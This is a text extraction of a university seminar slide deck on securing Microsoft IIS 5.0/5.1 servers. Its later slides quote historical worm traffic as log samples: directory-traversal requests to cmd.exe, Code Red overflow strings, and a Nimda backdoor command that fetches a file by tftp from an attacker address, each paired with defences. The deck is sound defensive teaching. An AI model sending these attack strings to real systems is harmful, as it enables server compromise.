Title: IIS 5'05'1 Security
1IIS 5.0/5.1 Security
- Laurie Walters
- Lxm30_at_psu.edu
- Security Operations and Services
- A Unit of Information Technology Services
2IIS Security Seminar Objectives
- IIS Security
- Installation of IIS
- Backing Up IIS Configuration files
- Securing IIS manually and with IIS Lockdown tool
- Authentication
- FTP and SMTP
- Logging
- Common IIS Breaches and how to prevent them
3Installing IIS
- IIS Patch must be applied before machine is
networked! - It is better to install IIS after operating
system is secured than while initially setting up
OS. - Add / Remove Programs ? Add / Remove Windows
Components
4IIS Installation
- By default, the following are installed
- Common Files
- Documentation
- Front Page 2000 Server Extensions
- IIS Snap-In
- SMTP service
- WWW Service
- Do not install Documentation on a production web
server. - If you are not using Form Mail, do not install
SMTP service.
5IIS Installation
- The following are not installed by default
- FTP Service
- Scripts virtual directory
- Do not install these unless absolutely necessary
6IIS Installation
- Adds Internet Information Services snap in (ISM)
and server extension administrator snap in to
Administrative Tools. - Adds accounts
- IUSR_MACHINENAME built in account for anonymous
IIS access - IWAM_MACHINENAME built in account for out of
process access
7Uninstallation of IIS
- Following arent uninstalled
- \Inetpub
- \Systemroot\Help\iishelp
- \Systemroot\system32\inetsrv
- Following users are not removed
- IUSR_Machinename
- IWAM_Machinename
8IIS Security Seminar Objectives
- IIS Security
- Installation of IIS
- Backing UP IIS Metabase
- Securing IIS manually and with IIS Lockdown tool
- Authentication
- FTP and SMTP
- Logging
- Common IIS Breaches and how to prevent them
9Backing Up IIS Metabase
- The IIS Metabase is similar to the Windows
registry. It stores configuration entries for
IIS. - The Metabase can become corrupted so it should be
backed up every time a change is made to IIS.
10Backing Up IIS Metabase
- To backup the Metabase, in the ISM, right click
on your server icon and select Backup/Restore
Configuration. - Click on Create Backup and enter a meaningful
name.
11IIS Security Seminar Objectives
- IIS Security
- Backing Up IIS Metabase
- Installation of IIS
- Securing IIS manually and with IIS Lockdown tool
- Authentication
- FTP and SMTP
- Logging
- Common IIS Breaches and how to prevent them
12Ways to Overcome Common IIS Breaches Other Than
Patching
- Patching prevents current vulnerabilities
13Other means than patching help secure against
future vulnerabilities
- Always install IIS on NTFS formatted drives
- Install IIS on separate hard drive or
- Do not allow everyone or the IUSR account to run
.exe (e.g. cmd.exe) commands - Use URLScan and IIS Lockdown Tools
- Follow suggested SOS guidelines for securing OS
and IIS
14IIS Lockdown Tool
- http//www.microsoft.com/technet/treeview/default.
asp?url/technet/security/tools/Tools/locktool.asp
- Turns off unnecessary services and features of
IIS.
15URLScan
- Part of IIS Lockdown tool. It also turns off
unneeded features and restricts type of HTTP
requests that the server can process. - Execute the following command
- Iislockd.exe /q /c tltc\lockdown_files
- It will install urlscan.exe to this folder.
- Run Urlscan.exe to install it.
16What can be filtered with URLScan
- Request method (verb) e.g. GET, Head, Post, etc.
- File extension of the resource requested
- Suspicious URL encoding
- Presence of non-ASCII characters in the URL
- Presence of specified character sequences in the
URL - Presence of specified headers in the request
17Additional abilities of URLScan 2.5
- Ability to change the log file directory
- Ability to log long URLs
- Ability to restrict the size of requests
18Securing IIS Manually
- Change permissions on vital files
- Cacls systemroot\.exe /T /G SystemF
AdministratorsF - Also change permission for the file command.com
- Do not use Default Web Site
- Stop Administrative Web Site
- Remove IIS Samples and Documentation
- Group all static content separate from scripts,
executables, etc. - Remove Unnecessary script mappings
19Make sure you have the correct version of MDAC
- MDAC provides the underlying functionality for
database operations, like connecting to remote
databases and returning data to a client. - Heap overflow vulnerability in versions 2.6 and
lower. - If you do not need MDAC, remove this virtual
directory from your system.
20Removing Unnecessary Script Mappings
- .ida, .idq, .htw Index Services
- .htr web-based Windows Password reset
- .printer Internet Printing Protocol
- .stm, .shtm, .shtml Server-side includes
- .idc database applications
21Disabling Parent Paths
- Parent Paths allow you to use relative file path
names (../directory/file.html instead of
c/directory/file.html). - The vulnerability in Parent Paths is that they
can be exploited to move in reverse through file
structure to get to root of C/, - Then one can traverse to known file locations
that are - more permissive (e.g. C\wwwroot\inetpub\scripts)
or - contain goodies (e.g. C\winnt\system32)
22You can disable parent paths and still use
relative pathnames
- Note It is possible to use relative pathnames
with some effort. - (e.g. if your IIS data folder is in a different
folder than your database and you dont want to
use absolute pathnames for everything). - You have to use some coding to make a variable
for the absolute pathname and use it to implement
relative pathnames. - http//www.windowswebsolutions.com/Articles/Index.
cfm?ArticleID23278
23Demonstrations
- Manually securing IIS
- IIS Lockdown Tool
24IIS Security Seminar Objectives
- IIS Security
- Installation of IIS
- Backing Up IIS Metabase
- Securing IIS manually and with IIS Lockdown tool
- Authentication
- FTP and SMTP
- Logging
- Common IIS Breaches and how to prevent them
25IIS Authentication
- To set means of IIS Authentication, right click
on your web site and select properties, then
choose the directory security tab. Click on the
Edit button next to Anonymous access and
Authentication control. - Anonymous - uses IUSR_Machinename to anonymously
access the site - Integrated Windows users connect to the machine
with a Windows username and password - Basic authenticates to machine using
unencrypted username / password (user accounts
must have log on locally rights). - Digest authentication within a W2K domain,
password hashes compared against DC hashes. - Kerberos authenticate to a K4 or K5 domain
26IIS Security Seminar Objectives
- IIS Security
- Installation of IIS
- Backing Up IIS Metabase
- Securing IIS manually and with IIS Lockdown tool
- Authentication
- FTP and SMTP
- Logging
- Common IIS Breaches and how to prevent them
27FTP and SMTP
- Disable SMTP and FTP if not needed if absolutely
needed, limit access by userid/pw or IP address - Use other means than FTP if possible (WebDav,
Terminal Services, etc). - Allowing totally anonymous connections to machine
bad idea. - Specify directory where users can upload/download
files. - Create appropriate permissions on files in this
directory (e.g. remote users can read but not
write or execute files).
28IIS Security Seminar Objectives
- IIS Security
- Installation of IIS
- Backing Up IIS Metabase
- Securing IIS manually and with IIS Lockdown tool
- Authentication
- FTP and SMTP
- Logging
- Common IIS Breaches and how to prevent them
29IIS Logging
- Enable extended logging properties in IIS Manager
- W3C Extended Log Format instead of Active Log
- Make sure Date, Time, Server IP, Client IP, URI
Stem and URI Query are checked - Daily logs kept in UTC (GMT) format in the
following location C\Windows\System32\Logfiles\W
3SVC1\ex020930.txt - Check the box Use local time for file naming and
rollover so that logs are kept in EST/EDT
instead of GMT.
30IIS Security Seminar Objectives
- IIS Security
- Installation of IIS
- Backing Up IIS Configuration files
- Authentication
- FTP and SMTP
- Securing IIS manually and with IIS Lockdown tool
- Logging
- Common IIS Breaches and how to prevent them
31Common IIS Breaches
- Buffer Overflows (XXXXXXXXXXXXXXXcode)
- Directory Traversal (../../../cwinnt/system32/cmd
.exe) - Canonicalization
- Request unusual action using cmd.exe, .bat
- Encoded using an alternate character set (e.g.
Unicode) or include character sequences that are
rarely seen in legitimate requests. - All of above used for recent worms (e.g.
IIS/Sadmind, Code Red, Code Red 2, Nimda)
32Buffer Overflows
- Programs dont check input for appropriate
length. - Extra input above and beyond maximum length gets
attached to CPU execution stack. - Attackers must carefully program B.O. code to
identify the location of where it is added the
stack, so that they can return to this location
and execute the arbitrary input.
33Problem with Buffer Overflows in IIS
- IIS process runs in the context of the SYSTEM
account. - When a Buffer Overflow is leveraged against IIS,
arbitrary commands can be run under context of
SYSTEM user.
34Canonicalization
- Various file names are equivalent
- E.g. c\directory\file.html, file.html, and
..\..\file.html may all refer to the same file - When some non-static file types are requested via
a malformed URL, the canonicalization locates the
correct file, but mixes up the actual location of
the file. - Since it determines the file is in a different
folder than it actually is, it applies incorrect
permissions.
35Problem with Canonicalization
- A file in a folder with restricted permissions
would be requested, however, the permissions
granted would be of the files ancestors rather
than actual file permissions - If parent permissions are less restrictive, the
attacker could get extra privileges for the
file.
36Directory Traversal (Dot Dot Slash)
- Results from inadequate NTFS ACLs on the
directory or files in question. - http//www.iistestbox.com/../../../../../winnt/sys
tem32/cmd.exe
37Examples of Unicode and Hex Encoding URLS
- Unicode Example Arabic letters
- Hexadecimal Examples
- Space 20
- Plus 2B
- Period 2E
- / 2F
- Colon 3A
- ? 3F
- \ 5C
- 25
38Hexadecimal use
- Good use of hexadecimal
- http//www.iistestbox.com/files/the20name20o
- f20the20file.txt
- Bad use of hexadecimal
- http//www.iistestbox.com/..2F..2Fwinnt/file.txt
- Double decoding of hex
- IIS performs two decodes of HTTP requests that
traverse executable directories - 255c
- 1st decode 5c
- 2nd decode \
39IIS Sadmind Worm
- GET /scripts/../../winnt/system32/cmd.exe /cdir
200 - 2001-05-06 122019 10.10.10.10 -
10.20.20.20 80 - GET /scripts/../../winnt/system32/cmd.exe
/cdir..\ 200 - 2001-05-06 122019 10.10.10.10
- 10.20.20.20 80 \ - GET /scripts/../../winnt/system32/cmd.exe
/ccopy\winnt\system32\cmd.exeroot.exe 502 -
2001-05-06 122019 10.10.10.10 - 10.20.20.20 80
\ - GET /scripts/root.exe /cecholtHTML code inserted
heregt.././index.asp 502 -
40Affects of IIS / Sadmind
- sadmind/IIS worm exploited a vulnerability in
Solaris systems The Solaris worm created a root
shell on the infected host and automatically
attacked other vulnerable Solaris systems. - It subsequently installed software to attack and
deface Microsoft IIS web servers
41Ways to Protect Against IIS Sadmind
- Microsoft Patch MS00-078 to prevent
Canonicalization - Disable Parent paths
- Restrict Access to cmd.exe so that it cant be
used by the worm
42.printer Buffer Overflow (jill.c)
- .printer Web based control of networked printers
- GET /NULL.printer HTTP/1.0
- Host 420character buffer
- Instead of crashing, IIS automatically restarts
itself due to Redundancy - Jill exploits .printer B.O. vulnerability to
create a remote shell, where attacker can enter
any command at the following prompt - C\WINNT\System32gt
43Ways to protect against Jill B.O.
- Microsoft Patch MS01-023
- If not using IPP,
- Unmap the .printer DLL file extension in IIS so
that it is not loaded on IIS startup. - Or, you could delete the file C\Winnt\System32\ms
w3prt.dll which is the actual file that the
.printer extension points to.
44.ida/.idq Buffer Overflow
- .ida provides support for administrative scripts,
- .idq provides support for internet data queries
(Indexing Services) - .ida/idq B.O works by using .ida to send a
too-long variable to the idq.dll - GET /null.ida? 240 character bufferX HTTP/1.1
- IIS process is halted before this even reaches
Index service, restarts IIS
45Code Red 1 Worm (Another .ida/.idq worm)
- /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNu
9090u6858ucbd3u7801u9090u6858ucbd3
u7801u9090u6858ucbd3u7801u9090u9090u8190u0
0c3u0003u8b00u531 bu53ffu0078u0000u00a
46Affects of Code Red 1
- A machine infected with Code Red 1 scans random
IP addresses on port 80/TCP looking for other
hosts to infect. - Code Red 1 is stored in memory (when machine
reboots, worm no longer performs scans). - Web pages on Code Red 1-infected machines may be
defaced with the following message - HELLO! Welcome to http//www.worm.com! Hacked By
Chinese!
47Ways to Protect Against Code Red 1
- Microsoft Cumulative Patch MS 02-062 (original
patch MS01-033) - If not using Indexing Services, remove
application mapping for .ida and .idq - Install URLScan to deny functionality of any
request with hexadecimal
48Code Red 2
- GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXu9090u6858ucbd3u7801u9090u6858ucbd
3u7801 u9090u6858ucbd3u7801u9090u9090u8190
u00c3u0003u8b0 0u531bu53ffu0078u0000u00a
49Affects of Code Red 2
- After a successful .ida/.idq B.O., CR2 creates
threads to scan for new infected hosts for the
next 24 hours. - Unlike Code Red I, CR2 is not only
memory-resident. - CR2 then copies cmd.exe to the file root.exe in
the publicly accessible IIS scripts and MSADC
folders (an intruder may then execute arbitrary
commands with the privileges of the IIS server
process).
50CR2 Contains a Backdoor Trojan
- A Trojan horse copy of explorer.exe is created
with CR2 and copied to C\ and D\. - The Trojan horse explorer.exe calls the real
explorer.exe to mask its existence, and creates a
virtual mapping which exposes the C and D
drives. - On systems not patched against the "Relative
Shell Path" vulnerability,this Trojan horse copy
of explorer.exe will run every time a user logs
in.
51Ways to Protect Against CR2
- Microsoft Cumulative Patch MS02-062
- If not using Indexing Services, remove
application mapping for .ida and .idq - Install URLScan to deny functionality of any
request with hexadecimal - Restrict Access to cmd.exe so that it cant be
used by the worm - Protect against the"Relative Shell Path"
vulnerability Microsoft Patch MS02-052
52Nimda Worm
- Nimda worm sent with an attachment
- pretends to have a "audio/x-wav" content-type
- (Really an executable file).
- If executed, it infects the host, causing various
files to be replaced with infected copies. - The worm sends itself out by email, searches for
open network shares, attempts to copy itself to
un-patched or vulnerable Microsoft IIS web
servers, and is a virus infecting both local
files and files on remote network shares.
53Nimda
- GET /scripts/root.exe?/cdir
- GET /MSADC/root.exe?/cdir
- GET /c/winnt/system32/cmd.exe?/cdir
- GET /d/winnt/system32/cmd.exe?/cdir
- GET /scripts/..5c../winnt/system32/cmd.exe?/cdir
- GET /_vti_bin/..5c../..5c../..5c../winnt/system
32/cmd.exe?/cdir - GET /_mem_bin/..5c../..5c../..5c../winnt/system
32/cmd.exe?/cdir - GET /msadc/..5c../..5c../..5c/..\xc1\x1c../..\x
c1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/cdi
r - GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/
cdir - GET /scripts/..\xc0/../winnt/system32/cmd.exe?/cd
ir - GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/
cdir - GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/
cdir - GET /scripts/..35c../winnt/system32/cmd.exe?/cdi
r - GET /scripts/..35c../winnt/system32/cmd.exe?/cdi
r - GET /scripts/..5c../winnt/system32/cmd.exe?/cdir
- GET /scripts/..2f../winnt/system32/cmd.exe?/cdir
- Note The first four entries in these sample logs
denote attempts to connect to the backdoor left
by Code Red II, while the remaining log entries
are examples of exploit attempts for the
Directory Traversal vulnerability.
54Nimda on IIS Server
- Nimda attempts to install an Admin.dll file in
the root directory of c\, d\, or e\ (Note that
the file name Admin.dll may be legitimately
installed by IIS in other directories.) - It then scans other systems on port 80,
attempting to infect them with Nimda
55Nimda Backdoor
- Attackers send string /ctftp20-i20x.x.x.x20GE
T20Admin.dll20d\Admin.dll to attempt to
connect to infected systems. - A return code of 200 indicates success of this
command.)
56Ways to Protect Against Nimda (Email Portion)
- Microsoft Patch for automatic execution of
previewed files in Outlook (MS01-020) - Do not open attachments without verification
- Protect against open network shares
57Ways to Protect Against Nimda (IIS Portion)
- Microsoft Cumulative Patch MS02-062 (Protects
against both means of Nimda IIS infection Code
Red 2 Backdoor and Directory Traversal) - If not using Indexing Services, remove
application mapping for .ida and .idq - Install URLScan to deny functionality of any
request with hexadecimal - Restrict Access to cmd.exe so that it cant be
used by the worm - Protect against the "Relative Shell Path"
vulnerability of explorer.exe Microsoft Patch
MS02-052 - Disable Parent Paths
58IIS Security Seminar Objectives
- Installation of IIS
- Backing Up IIS Configuration files
- Securing IIS manually and with IIS Lockdown tool
- Authentication
- FTP and SMTP
- Logging
- Common IIS Breaches and how to prevent them
59In Conclusion
- IIS is a big target for skilled hackers as well
as script kiddies. - Staying current on patches will help prevent your
IIS box from being broken in to, however, proper
locking down will also be highly effective
against future vulnerabilities.
60Microsoft Security Guides
- Microsoft Guide to Securing IIS 5
- http//www.microsoft.com/technet/treeview/default
.asp?url/technet/prodtechnol/iis/tips/iis5chk.asp
- Microsoft Guide to Securing Windows 2000
- http//www.microsoft.com/technet/treeview/default
.asp?url/technet/security/prodtech/windows/secwin
2k/default.asp
61Slides and Recommended Guidelines
- Todays Slides, recommended guidelines for IIS,
Windows 2000 and XP, links to security tools and
further reading - http//www.personal.psu.edu/lxm30/windows/windows
.html
62